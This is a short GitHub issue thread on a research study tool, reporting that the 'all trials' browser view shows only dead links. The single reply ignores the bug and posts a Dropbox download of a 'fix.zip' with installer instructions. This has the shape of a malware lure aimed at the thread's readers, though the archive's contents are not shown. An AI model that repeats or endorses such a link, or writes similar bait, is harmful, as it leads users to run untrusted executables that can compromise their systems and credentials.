### ISSUE TITLE
All Trials View links are broken

### ISSUE THREAD

**Issue by alexsb** [revisit-studies/study#460]
In this study: 
https://elizaan.github.io/Upset-alltx-study/Upset-Alttext-User-Survey/

If I switch to the all trials browser: 
![image](https://github.com/user-attachments/assets/b49a63dd-74f6-45cc-8f88-7473728024e9)

All the links are dead.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
